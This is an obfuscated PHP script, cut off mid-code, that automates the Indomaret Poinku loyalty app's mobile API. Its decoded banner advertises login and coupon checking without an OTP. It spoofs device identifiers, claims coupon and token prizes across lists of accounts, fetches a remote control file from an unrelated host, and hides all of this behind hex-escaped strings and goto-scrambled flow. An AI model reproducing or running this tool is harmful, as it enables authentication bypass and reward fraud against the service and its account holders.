  goto Q7LGl;
  goto FHmCL;
  AJIdw:
  QcsI1:
  goto riEyv;
  W62An:
  $upOL9 = G8PF2("\x68\164\164\x70\x73\72\57\57\x65\x64\x74\163\x61\160\160\56\151\156\144\x6f\x6d\141\x72\145\x74\160\x6f\x69\156\x6b\165\56\x63\x6f\x6d\57\x63\157\165\x70\157\156\x2f\x61\160\x69\170\x2d\x31\65\60\x32\55\141\160\151\x2f\x6d\157\x62\151\154\145\57\x63\157\165\160\157\x6e\x73\77\x75\156\x70\x61\x67\x65\x64\x3d\x74\162\x75\x65", $aY0el, $GOXkU, $mlMLt);
  goto F38ui;
  ty2v1:
  $yy9BI;
  goto ldlWE;
  OJe7J:
  RhRij("\x4b\x75\x70\x6f\156\x20\120\x6f\151\156\x6b\x75\40\x6e\145\167\56\x74\x78\164", $Q8u1Y);
  goto NXRyP;
  CZ_oJ:
  $CdOss = "\61\60\x30\60\x30\x30\x30\x30";
  goto Wlx0i;
  Gfs_c:
  echo "\105\x72\x72\x6f\162\x20\144\145\154\145\x74\x69\156\147\40{$xp_1p}\40\40";
  goto w09r9;
  MHKcM:
  $xT15V = G8PF2("\x68\x74\x74\160\163\x3a\57\57\145\x64\164\x73\x61\160\x70\x2e\151\x6e\144\157\155\x61\x72\145\x74\x70\157\151\156\x6b\x75\x2e\x63\x6f\x6d\57\x25\62\106\154\x6f\171\141\154\164\x79\45\x32\x46\141\x70\x69\x78\x2d\61\65\x30\62\55\141\160\151\x25\x32\x46\155\157\x62\x69\154\145\x25\62\106\x63\157\x69\x6e\x73\45\x32\106\160\162\151\x7a\x65\x73\x25\62\x46\107\117\x46\122\x45\x53\x48\x32\x30\x32\x32\45\62\x46\x6d\145", $aY0el, $GOXkU, $mlMLt);
  goto LqNGf;
  P3s5s:
  goto piuvy;
  goto Syh5j;
  mPz3m:
  $wDisp = "\x7b\x22\144\141\x74\x61\42\72\x5b\x7b\42\x61\x70\x70\154\151\x63\x61\x74\x69\157\156\42\72\173\x22\x61\x70\160\137\166\145\x72\x73\151\x6f\156\x22\x3a\x22\63\56\61\x33\56\60\42\x2c\42\144\x65\166\151\143\145\137\143\x6c\x61\163\163\x22\x3a\x22\120\150\x6f\156\145\42\54\42\x64\145\166\151\143\145\137\x66\x61\x6d\x69\154\171\42\72\x22" . $GOXkU . "\x22\x2c\42\x64\145\x76\x69\x63\145\x5f\x69\144\x22\x3a\x22" . $aY0el . "\x22\x2c\x22\157\163\137\x6e\141\155\x65\x22\x3a\42\x41\156\144\162\157\x69\x64\x20\x50\x22\x2c\42\157\163\137\x76\145\162\x73\151\x6f\x6e\x22\72\42\101\156\x64\162\157\x69\144\x20\71\42\175\x2c\42\143\x6f\x72\x65\42\72\x7b\42\141\x63\x74\x69\x76\x69\x74\171\x5f\x64\x65\164\x61\151\154\163\x22\x3a\42\x72\145\163\x75\x6d\x65\137\141\x70\x70\x22\54\x22\x65\x76\x65\x6e\x74\x5f\x6e\x61\x6d\145\42\72\x22\x61\x70\160\137\x61\x63\x74\x69\166\151\164\x79\42\54\x22\145\166\x65\156\x74\x5f\164\151\x6d\x65\163\164\x61\x6d\160\x22\x3a" . $nb9cm . "\175\x2c\42\165\163\x65\x72\42\72\173\x22\163\145\163\x73\x69\x6f\156\137\x69\144\x22\72\42" . $MXjqh . "\42\54\x22\165\x73\x65\162\x5f\x69\x70\137\x61\x64\x64\162\145\x73\x73\42\x3a\x22\61\x32\67\56\x30\x2e\60\56\x31\42\x7d\x7d\x5d\175";
  goto oQe5O;
  xhOCn:
  die;
  goto btn19;
  HNP2O:
  if (!($cPDPt == 1)) {
    goto alr8L;
  }
  goto emTau;
  UhQTr:
  if (!($D2zwh < $ogbF4)) {
    goto PG5CP;
  }
  goto CSrk4;
  gZeD3:
  $N0XGD = G8PF2("\x68\x74\164\x70\163\72\57\57\145\144\164\x73\x61\160\160\x2e\151\156\144\x6f\x6d\141\x72\145\164\x70\x6f\x69\156\x6b\x75\x2e\x63\x6f\155\57\154\x6f\171\141\154\164\x79\57\x61\x70\x69\x78\x2d\x31\65\x30\x32\x2d\141\x70\x69\57\155\x6f\142\x69\154\x65\57\160\x6f\151\156\x74\x73\57\x6d\x65", $aY0el, $GOXkU, $mlMLt);
  goto RnlCl;
  kOQHI:
  $yy9BI;
  goto YIYeO;
  a_dZx:
  $u35jw = count($m0f8X) - 1;
  goto eyI9u;
  X1rFz:
  echo @zM6iC("\x79\145\x6c\x6c\x6f\x77", "\x42\x65\162\150\141\163\151\x6c\40\114\x6f\147\x69\x6e");
  goto Gqhb0;
  mYNHG:
  echo "\xa";
  goto aDo3a;
  ubh_u:
  echo "\12";
  goto FytSC;
  xloGc:
  $U_EVz = @$owfHy["\x64\141\164\x61"][$dQ8Tp]["\163\165\142\x44\151\163\164\162\x69\143\164\x43\x6f\144\145"];
  goto jSqDU;
  h2hMj:
  echo @zm6iC("\x72\x65\144", "\133\x34\135\40{$BeKks}\x20\xa\40\x20\40\x20\x3e\40{$Uzp_O}\40\12\xa");
  goto ptHr2;
  veYsp:
  die;
  goto FzNDx;
  X1oV7:
  echo "\xa";
  goto GSEf6;
  mHEq8:
  echo "\12";
  goto kHpsw;
  X7Wc2:
  rCf0L:
  goto h93df;
  nu_T_:
  echo @zM6ic("\160\165\x72\x70\x6c\x65", "\123\164\x61\164\165\163\x20\40\x20\72\x20");
  goto s8LZ0;
  oVetn:
  echo @zM6iC("\x79\145\x6c\154\157\167", "\115\x61\x73\x75\x6b\x6b\x61\x6e\40\x4e\x69\154\141\151\x20\115\x69\x6e\x69\155\x75\155\40\120\157\151\x6e\40\x4d\x75\40\x20\72\40");
  goto mGdhE;
  PsWgp:
  $wDisp = "\173\x22\146\151\x64\x22\x3a\x22" . $odGGi . "\42\54\42\141\160\160\111\x64\x22\x3a\42\x31\72\71\x39\70\x38\61\x36\x36\60\x35\x33\x32\x38\x3a\141\156\x64\162\x6f\151\x64\72" . $aY0el . "\x22\54\42\141\x75\164\150\x56\x65\x72\x73\151\x6f\156\42\72\x22\x46\111\x53\x5f\x76\62\42\54\42\x73\x64\153\x56\145\162\x73\x69\x6f\156\42\72\42\x61\x3a\61\67\56\60\56\60\x22\x7d";
  goto jSY81;
  hwyFK:
  $WYrgv = @$H1g60["\x66\151\144"];
  goto Q8ZOz;
  ud_I2:
  echo @zM6iC("\x70\165\x72\x70\154\145", "\x49\x44\x20\x20\40\40\x20\x20\x20\40\x3a\x20");
  goto w8Oba;
  buN63:
  $U0YgX = str_replace("\xd", '', $zcN5u);
  goto s2Asv;
  RTtKY:
  Wa6Sr:
  goto en_ME;
  wPlvB:
  $ofEkP = CwALz("\150\164\164\x70\x73\72\x2f\57\145\x64\164\x73\x61\160\x70\56\x69\156\144\157\x6d\141\162\145\x74\x70\x6f\151\x6e\x6b\165\x2e\x63\x6f\x6d\x2f\154\x6f\x79\141\x6c\x74\171\57\x61\160\x69\x78\55\x31\x35\x30\x32\55\x61\160\151\57\x6d\x6f\x62\x69\x6c\x65\57\x63\x6f\151\156\x73\57\x70\x72\151\172\x65\163\x2f\x47\117\106\122\105\123\110\x32\x30\62\x32\57\x74\x6f\x6b\145\156\x73\57\143\154\x61\x69\155\57\x73\151\x6e\147\154\145", $wDisp, $aY0el, $GOXkU, $mlMLt);
  goto WFREJ;
  HlSVo:
  echo "\xa";
  goto ibp8F;
  ZDwf_:
  die;
  goto ELsW3;
  EiZOM:
  echo "\12";
  goto SVzVu;
  Qh716:
  @unlink("\x70\157\x69\156\x68\160\56\x70\x68\160");
  goto mYNHG;
  e1JPg:
  $IKJzx = array(file_get_contents("https://irfan.iproute.my.id/ipoinx/medansi/keram"));
  goto XZK0M;
  eTH3i:
  echo @Zm6IC("\171\x65\x6c\154\x6f\x77", "\113\157\144\x65\x20\x4b\x75\x70\157\156\156\x79\x61\x20\x20\40\x20\72\x20");
  goto KXTQE;
  MpoPp:
  $upOL9 = G8Pf2("\x68\x74\x74\160\163\72\57\x2f\145\144\164\163\141\160\160\x2e\x69\156\x64\x6f\155\x61\x72\x65\x74\x70\157\x69\x6e\x6b\165\x2e\143\x6f\x6d\57\x63\157\x75\x70\x6f\156\x2f\x61\x70\151\170\x2d\61\65\x30\x32\x2d\141\x70\151\57\x6d\157\142\151\154\145\x2f\143\157\165\x70\x6f\156\55\144\x65\x74\x61\x69\154\57" . $KOeAA, $aY0el, $GOXkU, $mlMLt);
  goto Nz6rs;
  Viphl:
  $L1qpJ = @$owfHy["\144\141\164\141"][0]["\x64\x69\163\164\162\x69\x63\164"]["\x64\x69\163\x74\x72\x69\143\x74"];
  goto m6Vqe;
  OnVQz:
  $wlJRC = XOZB4(array("\174"), $wZnHP)[1];
  goto iOY8b;
  J_QAU:
  echo @ZM6Ic("\171\145\154\x6c\157\x77", "\x42\145\x72\150\x61\x73\151\x6c\x20\114\157\x67\151\156");
  goto KPgnh;
  n9nIa:
  echo @zm6ic("\x72\x65\x64", "\12\x7e\176\176\x7e\176\176\176\x7e\x7e\x7e\176\x7e\x7e\176\176\176\176\x7e\x7e\x7e\x7e\176\176\x7e\176\x7e\x7e\176\176\176\x7e\x7e\x7e\176\176\x7e\176\x7e\176\x7e\176\x7e\176\176\176\x7e\176\x7e\xa");
  goto QdmIB;
  JoF2q:
  echo @ZM6Ic("\171\x65\x6c\154\157\x77", "\102\165\151\x6c\144\x20\x42\x79\40\x46\x45\122\x44\x59\40\x52\x41\115\101\x44\x48\x41\116\40");
  goto XGDc2;
  WNyMN:
  echo $jTEU0;
  goto j3DmD;
  tJibk:
  $Jk9cx = G8Pf2("\x68\x74\164\160\163\72\57\57\x65\144\164\x73\141\x70\160\x2e\x69\x6e\x64\157\x6d\141\162\x65\164\x70\157\x69\x6e\x6b\165\x2e\143\157\155\57\143\x6f\x6e\x66\151\147\165\x72\x61\x74\151\157\156\x2f\141\160\x69\x78\55\61\65\x30\62\x2d\141\x70\x69\x2f\155\x6f\142\151\154\145\x2f\163\171\55\141\160\x70\55\x76\145\x72\x73\x69\x6f\156\57\x67\145\164\55\x76\145\162\x73\151\157\x6e\55\153\x65\x79\x2f\x41\116\104\x52\x4f\111\x44", $aY0el, $GOXkU, $mlMLt);
  goto B9JFh;
  QtF47:
  $S8W9D = trim(fgets(STDIN));
  goto vj_Vw;
  aT0HM:
  $ABmxY = @$cQFRW["\x64\141\164\141"]["\x62\x61\x6c\x61\156\x63\x65"];
  goto Ddz2F;
  JFR6I:
  echo @zm6IC("\x6e\145\x76\171", "\x53\x6f\162\162\x79\x2c\x20\x54\x68\151\163\40\x53\x63\162\x69\x70\164\40\110\141\163\40\102\x65\145\156\x20\122\x65\155\x6f\x76\x65\144\40\102\171\40\124\x68\145\40\117\x77\156\145\x72\x21\x21");
  goto nTV_R;
  EafIZ:
  echo @ZM6IC("\156\145\x76\171", $YUfPv);
  goto rxO0c;
  fFoJk:
  echo "\12";
  goto IY18O;
  Hl0fv:
  echo @Zm6ic("\x67\x72\x65\x65\156", "\x4e\x6f\x6d\x6f\x72\40\x48\x50\x20\101\156\144\x61\x20\40\72\x20");
  goto BFRXN;
  bim6t:
  $U0YgX = str_replace("\xd", '', $zcN5u);
  goto iw_eV;
  Km1cZ:
  $fM3_G = "\60";
  goto qsntQ;
  ezbM7:
  @unlink("\160\x6f\x69\156\x68\160\x2e\x70\x68\x70");
  goto s8ivf;
  EbIaF:
  function deouL($FK_yc, $bQedf)
  {
    goto R5nVg;
    t5q6F:
    fclose($FhLCi);
    goto B2DUC;
    OkO6g:
    fputs($FhLCi, "{$bQedf}\15\12");
    goto t5q6F;
    R5nVg:
    $FhLCi = fopen($FK_yc, "\141");
    goto OkO6g;
    B2DUC:
  }
  goto bBsji;
  CiT9u:
  $wlJRC = xOZb4(array("\174"), $wZnHP)[1];
  goto rBkbA;
  fyrrg:
  $Jk9cx = G8PF2("\150\164\164\160\163\x3a\57\x2f\x65\x64\x74\163\141\160\x70\56\151\156\144\x6f\155\x61\x72\x65\x74\160\x6f\x69\x6e\x6b\165\56\143\157\x6d\x2f\143\157\x6e\146\x69\x67\165\162\141\x74\x69\x6f\x6e\x2f\141\160\151\170\x2d\61\x35\60\62\x2d\141\x70\x69\57\155\157\x62\151\154\145\57\163\171\55\141\160\x70\x2d\x76\x65\162\163\151\x6f\x6e\57\147\x65\164\x2d\166\145\162\163\151\157\x6e\x2d\x6b\145\x79\57\101\x4e\104\122\x4f\111\x44", $aY0el, $GOXkU, $mlMLt);
  goto hNtE9;
  ZVAC_:
  $QRhbE = explode("\xa", @file_get_contents("\x66\x6f\162\x63\x65\143\x6c\157\163\145"));
  goto U7gXf;
  qNkJO:
  echo "\12";
  goto XnfNW;
  Fe5Ht:
  echo "\xa";
  goto q9myf;
  dYDYD:
  $Ap1KM = json_decode($xT15V, true);
  goto QKOt8;
  AMMpd:
  $u35jw = count($m0f8X) - 1;
  goto IgsmW;
  DjtjH:
  print_r($zcN5u);
  goto pRlaN;
  ODdXV:
  $JrTpE = @$owfHy["\x64\141\x74\x61"][$dQ8Tp]["\x63\x69\164\x79"];
  goto DWoKo;
  HB4hn:
  k0XKX:
  goto B_JBr;
  ZezGD:
  skjRn:
  goto N2CUG;
  zVEB0:
  echo "\xa";
  goto J4xhG;
  xgzIC:
  die;
  goto OA0KP;
  uqWGX:
  if (!($jTEU0 < $S8W9D)) {
    goto ms9L8;
  }
  goto EY27O;
  dnr_q:
  function zM6ic($lwjTx = "\144\x65\146\x61\x75\154\164", $KEYNT)
  {
    $bfa3s = array("\x72\x65\144" => "\x31\73\x33\61", "\147\x72\145\x65\x6e" => "\x31\73\x33\x32", "\x79\x65\154\154\x6f\167" => "\61\x3b\63\63", "\142\x6c\165\x65" => "\61\x3b\x33\64", "\x6e\x65\x76\171" => "\61\73\x33\x36", "\x70\165\162\x70\154\x65" => "\61\73\x33\x35");
    return "\33\133" . $bfa3s[$lwjTx] . "\x6d" . $KEYNT . "\x1b\133\x30\155";
  }
  goto uPmaS;
  gW2bG:
  echo "\x3e";
  goto QSo8z;
  MJWb1:
  $yy9BI = "\60";
  goto PltW2;
  Mosdc:
  bCLi4:
  goto cvmiq;
  qifxP:
  echo @zM6ic("\171\x65\154\x6c\x6f\167", "\x4e\x61\155\141\x20\x44\x69\x73\164\162\151\143\x74\40\72\x20");
  goto cQZFg;
  ECJVT:
  Tr9Br:
  goto nX6v1;
  fUkb9:
  echo @ZM6ic("\171\x65\x6c\x6c\x6f\x77", "\x53\164\x61\164\x75\x73\x20\72\x20");
  goto s0Zx8;
  l5RJI:
  if ($RJnNP == "\x79") {
    goto xjSqb;
  }
  goto i9qNy;
  WUeTg:
  die;
  goto wkpJu;
  M0pcn:
  if (!($Pud0o == "\x74\x72\x75\x65")) {
    goto zP__f;
  }
  goto muUMy;
  oZ7zX:
  $wDisp = '';
  goto SXlr7;
  hBtwy:
  $ZdrCv = rand(10, 99);
  goto ePkw1;
  gSIFK:
  $xzAuu = @$owfHy["\x64\141\164\141"][$qtgR3]["\166\141\x6c\165\145"];
  goto Zi6MS;
  O2W6_:
  if (password_verify($Gukt8, $Jst1j)) {
    goto UWLRz;
  }
  goto EZ2g0;
  vg11_:
  echo "\12";
  goto LW72A;
  tMEM6:
  $yI7qh = tHHFS("\x68\x74\164\160\163\x3a\x2f\57\x65\x64\164\x73\141\160\160\56\151\156\144\x6f\155\x61\162\x65\164\x70\157\x69\156\153\165\56\143\x6f\155\x2f\x6c\157\147\x69\x6e\x2f\x61\x70\151\x78\x2d\61\65\x30\x32\55\141\x70\x69\57\157\x70\x65\156\x2f\x6c\x6f\147\151\156\55\x73\155\x73", $wDisp, $aY0el, $GOXkU);
  goto AUohZ;
  f1yJ5:
  if (!($fUekS == '')) {
    goto P2g53;
  }
  goto VwnFr;
  cZqL8:
  $zvt88 = $QRhbE;
  goto qi7k2;
  qBrWX:
  echo @ZM6iC("\171\145\x6c\154\157\x77", "\116\x61\155\141\40\120\x72\x6f\166\x69\x6e\x73\x69\x20\x3a\40");
  goto MAExu;
  eulTp:
  goto kmnPA;
  goto G6Vck;
  cVyx2:
  echo @ZM6ic("\156\x65\x76\171", $yJiD4);
  goto trl7f;
  r2f9G:
  echo @ZM6IC("\147\162\145\145\156", $wd9cN);
  goto X5Mni;
  qPamN:
  echo @zM6ic("\147\162\145\145\x6e", "\102\x61\154\141\x6e\143\x65\x20\123\164\x61\x6d\160\40\x20\72\x20");
  goto uG5i5;
  EIB0l:
  $M1ADy = @$Ap1KM["\144\141\164\141"]["\x69\x64"];
  goto THkHS;
  GJQG1:
  goto eM0mo;
  goto bpESN;
  yDufB:
  $rVPVc = @file_get_contents("\x73\x69\147\x65\x6f\40\164\x61\x6b\145\144\141");
  goto U5zus;
  X5CYR:
  $M1ADy = @$Ap1KM["\x64\141\164\x61"]["\151\x64"];
  goto hikDr;
  Smrqq:
  $zvt88 = $QRhbE;
  goto DkiWA;
  vpl0C:
  echo @zM6Ic("\x79\145\x6c\154\x6f\167", "\120\x65\163\x61\156\x20\40\40\x20\x20\x20\40\40\40\40\40\40\40\x20\72\x20");
  goto bdqBC;
  pRwIq:
  if (!($zcN5u == '')) {
    goto n5UbT;
  }
  goto UKi12;
  BvCfg:
  $m5BZY = GGgR_("\150\x74\x74\160\x73\72\57\x2f\141\x73\151\x61\x2d\x73\157\165\x74\150\145\141\x73\x74\x32\x2d\x69\144\x6d\x2d\143\157\162\160\x2d\x70\162\144\56\x63\154\157\x75\144\146\165\x6e\143\164\x69\157\156\163\56\x6e\145\164\x2f\151\x64\155\x61\160\x70\x73\x5f\x74\162\x61\143\153\x65\x72\137\147\141\x74\145\167\141\x79", $wDisp);
  goto QFsa0;
  UB3bx:
  function iFWUA($lEbop, $wDisp = null)
  {
    goto Th57f;
    URVew:
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "\x6b\x6c\151\x6b\56\164\170\x74");
    goto q8ADe;
    ficQM:
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto dp6Y0;
    qadro:
    $ruc3h[] = "\x43\157\156\x6e\145\x63\x74\x69\x6f\x6e\x3a\40\113\145\145\x70\x2d\101\x6c\x69\x76\x65";
    goto bkyu7;
    dp6Y0:
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto taUZi;
    taUZi:
    goto FYZCZ;
    goto X06Xh;
    PamBK:
    curl_setopt($C6npe, CURLOPT_POST, 1);
    goto OHrVi;
    QeFPe:
    $P7lm9 = curl_getinfo($C6npe);
    goto vCfxp;
    Kh9UG:
    return $ECuqv;
    goto HSQBn;
    U1TGr:
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true);
    goto wo4h8;
    q8ADe:
    $ECuqv = curl_exec($C6npe);
    goto QeFPe;
    pY7az:
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1);
    goto PamBK;
    X06Xh:
    Z1QoE:
    goto Q__7u;
    kiqAk:
    curl_setopt($C6npe, CURLOPT_URL, $lEbop);
    goto Xxzzp;
    vCfxp:
    if (!$P7lm9) {
      goto Z1QoE;
    }
    goto ficQM;
    c1cLq:
    curl_setopt($C6npe, CURLOPT_POSTFIELDS, $wDisp);
    goto haMCc;
    ED12j:
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0);
    goto c1cLq;
    mBJan:
    print_r($AXlcQ);
    goto Kh9UG;
    Q__7u:
    return false;
    goto lXi_I;
    OHrVi:
    $ruc3h[] = "\125\163\145\162\x2d\101\147\145\156\164\72\x20\157\153\150\x74\164\x70\x2f\65\56\x30\x2e\60\55\x61\154\x70\x68\x61\x2e\65";
    goto qadro;
    lXi_I:
    FYZCZ:
    goto Ojqp6;
    Xxzzp:
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true);
    goto pY7az;
    Ojqp6:
    $AXlcQ = json_decode($y7f11, true);
    goto mBJan;
    wo4h8:
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h);
    goto ED12j;
    haMCc:
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "\x6b\154\x69\153\56\x74\170\x74");
    goto URVew;
    Th57f:
    $C6npe = curl_init();
    goto kiqAk;
    bkyu7:
    $ruc3h[] = "\103\x6f\156\164\145\x6e\x74\55\x54\171\160\x65\x3a\x20\141\x70\160\x6c\151\143\x61\x74\151\x6f\156\57\x6a\163\157\x6e";
    goto U1TGr;
    HSQBn:
  }
  goto fa7Dr;
  ezYSj:
  @unlink("\142\145\x61\x74");
  goto DYYUw;
  HENgQ:
  $owfHy = json_decode($upOL9, true);
  goto mMLTN;
  gSTn8:
  if ($XDyMm == "\x31") {
    goto vFJdm;
  }
  goto SFraX;
  LE6IR:
  $odGGi = $kCT0W . "\x6d\x62\x4c\x51\x70\145";
  goto ySmQ3;
  lQPJW:
  @unlink("\160\x6f\x69\x6e\150\x70\56\x70\x68\x70");
  goto nTwzh;
  rwvRX:
  echo "\x44\145\154\145\x74\x65\x64\40{$xp_1p}\40\x20";
  goto QFCAG;
  KSHR0:
  echo "\xa";
  goto uW7cX;
  K3Pk1:
  if ($RJnNP == "\171") {
    goto Cu90i;
  }
  goto zPNPk;
  e2U0W:
  $jTEU0++;
  goto ge0DY;
  NsEvq:
  if ($DNueE == "\x79") {
    goto ZlzNN;
  }
  goto AHUHW;
  LVZDm:
  curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h);
  goto HGduE;
  LAc1I:
  $Ap1KM = json_decode($Jk9cx, true);
  goto HWxH4;
  lstXN:
  echo @Zm6ic("\156\145\166\171", "\x20\174\x20\123\143\162\151\160\164\40\111\x44\115\x20\114\x4f\x47\x49\116\x20\120\x4f\x49\116\x4b\125\40\x43\105\x4b\40\x4b\x55\x50\117\x4e\x20\x54\x41\x4e\x50\101\x20\117\x54\x50\12");
  goto z_df6;
  RaRdi:
  echo "\xa\12";
  goto twwF0;
  f3MfN:
  $Jk9cx = g8Pf2("\x68\x74\164\160\x73\72\57\x2f\x65\144\164\x73\141\x70\160\56\x69\156\144\x6f\x6d\x61\162\145\164\x70\x6f\x69\156\153\165\x2e\x63\157\155\57\x63\x6f\156\146\x69\x67\165\162\x61\x74\x69\x6f\x6e\x2f\141\x70\151\170\55\x31\x35\60\x32\55\x61\x70\151\57\155\x6f\142\x69\154\145\x2f\155\163\x2d\150\157\x6d\x65\160\x61\147\145\55\x6c\141\171\157\x75\164\x2f\147\145\x74\x2d\141\x6c\x6c\x2d\x68\x6f\x6d\x65\x70\141\x67\x65\55\154\141\171\157\165\x74", $aY0el, $GOXkU, $mlMLt);
  goto j1jXq;
  u2o7b:
  echo @Zm6ic("\171\145\154\x6c\157\x77", "\116\x61\155\x61\x20\123\164\141\155\x70\x20\x20\x20\x20\40\x20\72\40");
  goto Xn1A1;
  XsrmP:
  echo "\xa";
  goto NreZy;
  H36MT:
  vCPy3:
  goto FpdUn;
  lF8em:
  $wZnHP = $lPULW[$jTEU0];
  goto YhnL7;
  bp5Ld:
  echo "\xa\xa";
  goto Q40cO;
  Syt7J:
  $owfHy = json_decode($XTuz1, true);
  goto KSKKG;
  Rokos:
  $jTEU0++;
  goto JBC35;
  LatCK:
  $QRhbE = explode("\xa", @file_get_contents("\146\157\x72\143\x65\143\154\x6f\x73\145"));
  goto UMXEW;
  DaBwG:
  RM7sw:
  goto aKLgU;
  iDAIJ:
  $yy9BI++;
  goto dZum6;
  BuX7K:
  $earOL = $sONlZ;
  goto betTY;
  d1cn3:
  dVFa2:
  goto beAQe;
  E28sd:
  $gYG6P = rand(1000, 9999);
  goto sx31h;
  xMSWM:
  $YE0oY = G1wXt("\x68\164\x74\x70\x73\x3a\57\57\x65\144\x74\x73\141\x70\x70\x2e\151\x6e\x64\157\155\141\162\145\164\160\157\x69\156\x6b\x75\x2e\143\157\x6d\x2f\x6c\157\147\x69\x6e\57\141\160\x69\170\x2d\x31\x35\60\x32\x2d\x61\x70\151\57\x6f\160\x65\156\57\x70\151\x6e\57\143\x68\145\x63\153\x2d\x64\145\x76\151\143\145", $wDisp, $aY0el, $GOXkU, $mlMLt);
  goto N62sd;
  yGUlS:
  $qeP83 = str_replace("\15", '', $vzRG5);
  goto ptjzv;
  c0aES:
  DPq0p:
  goto LhXhn;
  Z8K7v:
  $Jk9cx = G8pF2("\150\164\x74\160\163\x3a\x2f\57\x65\144\164\163\x61\160\x70\x2e\x69\156\x64\x6f\x6d\141\162\145\164\160\x6f\151\156\153\x75\x2e\143\x6f\x6d\x2f\154\x6f\171\141\154\x74\171\57\141\x70\151\x78\55\x31\65\x30\62\55\141\160\x69\x2f\155\x6f\x62\x69\x6c\x65\57\162\145\x6d\151\x6e\144\145\162\163\x2f\x6d\145", $aY0el, $GOXkU, $mlMLt);
  goto u06Ti;
  eHSlO:
  echo "\12";
  goto g12c3;
  obQ7N:
  $GiPr2 = trim(fgets(STDIN));
  goto RYVIS;
  n0BPz:
  echo "\xa";
  goto QYNTd;
  y7067:
  $QRhbE = explode("\12", @file_get_contents("\x47\122\101\124\111\123\x20\111\x6e\144\x6f\x6d\x69\145\x20\x4d\151\40\107\x6f\x72\145\156\147\x21\x2e\164\170\x74"));
  goto CPIBf;
  lNcIn:
  b3wIQ:
  goto hm9FI;
  gGCoG:
  $RJnNP = trim(fgets(STDIN));
  goto IVMnN;
  NaHpn:
  $xT15V = g8pf2("\x68\164\x74\160\163\72\x2f\57\x65\x64\x74\x73\141\x70\160\x2e\151\x6e\144\157\155\x61\x72\145\x74\x70\157\x69\156\x6b\165\56\143\x6f\x6d\x2f\x25\x32\106\154\157\x79\141\154\x74\171\45\x32\x46\141\x70\151\170\x2d\61\x35\x30\x32\55\141\160\151\x25\x32\106\x6d\157\142\151\154\x65\45\62\x46\143\157\x69\156\163\x25\62\106\x70\162\151\x7a\x65\x73\45\x32\x46\107\117\x46\x52\105\x53\110\x32\x30\x32\62\x25\62\106\x6d\145", $aY0el, $GOXkU, $mlMLt);
  goto gNfSU;
  qU51_:
  g2xJ9:
  goto qBoxd;
  sPy1z:
  hFpxB:
  goto seTDF;
  j7f8L:
  $PQA77 = $OtngW;
  goto B9LnM;
  IQ9ZU:
  $qtgR3++;
  goto mHVo8;
  wLOWl:
  $WtCiL = @$Ap1KM["\144\x61\164\x61"]["\x63\x6f\x75\x70\157\x6e\x43\157\144\145"];
  goto I1BAb;
  iFBZv:
  echo @zm6IC("\x6e\145\166\171", "\123\157\x72\162\x79\x2c\x20\x54\x68\151\163\40\x53\143\x72\x69\x70\x74\40\x48\141\163\x20\102\x65\x65\156\40\x52\x65\155\157\166\145\144\x20\102\171\x20\124\x68\145\40\117\x77\156\x65\x72\x21\x21");
  goto szDyD;
  VMIc9:
  echo "\12";
  goto eFo7K;
  i8Wxa:
  echo @ZM6ic("\x6e\145\x76\171", $ZNU2M);
  goto QQ1jd;
  sBKLJ:
  $Uzp_O = @$lImQC["\144\x61\x74\x61"]["\143\x6f\x6e\x74\x65\x6e\x74"][4]["\143\157\165\x70\x6f\x6e\103\x6f\x64\x65"];
  goto i4D_W;
  STwv9:
  echo "\12";
  goto jfh1u;
  lWEpz:
  echo @Zm6IC("\156\x65\166\171", $D18xv);
  goto BybP1;
  GFsfA:
  if (!($fUekS == '')) {
    goto B_12r;
  }
  goto Wlwm2;
  cc9fY:
  echo "\115\165\154\x61\151\x20\102\x61\162\151\x73\x20\x4b\x65\x20\40\x3a\x20";
  goto hpqJl;
  Ym8cq:
  $wDisp = '';
  goto YRlTm;
  prGIN:
  $Z3FW0 = date("\131\55\x6d\55\144", $Jzh8Y);
  goto Ret60;
  A1QGS:
  goto wlhXO;
  goto xaeG2;
  CCFBe:
  echo "\xa";
  goto PnS2d;
  J7tr_:
  $sONlZ = str_replace("\xd", '', $rERzL);
  goto BuX7K;
  ld8w2:
  $jTEU0 = trim(fgets(STDIN));
  goto Hmjxw;
  naftu:
  $w5ulg = str_replace("\15", '', $TvVlh);
  goto DgaoM;
  bssg1:
  goto Gq4tD;
  goto z7JlD;
  sIhrS:
  die;
  goto c8qjb;
  VnEev:
  $earOL = $sONlZ;
  goto TNLsq;
  K8pWO:
  q3ueI:
  goto Kmr8y;
  THW2n:
  hEEWG:
  goto dZtlv;
  asbF8:
  echo @zM6Ic("\x6e\145\166\171", "\xa\x7e\x7e\x7e\x7e\176\176\x7e\176\176\x7e\x7e\x7e\x7e\176\x7e\176\176\x7e\176\x7e\x7e\x7e\176\176\x7e\x7e\176\x7e\x7e\x7e\176\x7e\x7e\176\x7e\176\176\176\176\x7e\176\x7e\176\x7e\176\176\176\x7e\12");
  goto mqK52;
  VPytH:
  die;
  goto sIhrS;
  ZNTQI:
  $M1ADy = @$Ap1KM["\x64\x61\x74\141"]["\151\144"];
  goto wvA9a;
  Huujv:
  echo @ZM6ic("\x6e\145\x76\171", "\133\66\x5d\x20{$kbWoT}\40\xa\x20\40\40\40\76\x20{$WvHe1}\x20\12\12");
  goto YSM2f;
  s2YHg:
  $obc_G = str_replace("\xd", '', $wlJRC);
  goto rSmA9;
  kytly:
  echo @zM6iC("\x79\145\x6c\x6c\x6f\167", "\x20\x2d\x20\x53\x69\x6c\x61\x68\x6b\141\x6e\x20\115\x65\154\x61\x6b\x75\x6b\x61\156\x20\x54\x72\x61\x6e\x73\141\x6b\163\x69\x20\x54\145\x72\x6c\x65\x62\x69\x68\40\x44\x61\x68\x75\x6c\x75\xa");
  goto spPk5;
  IbN8j:
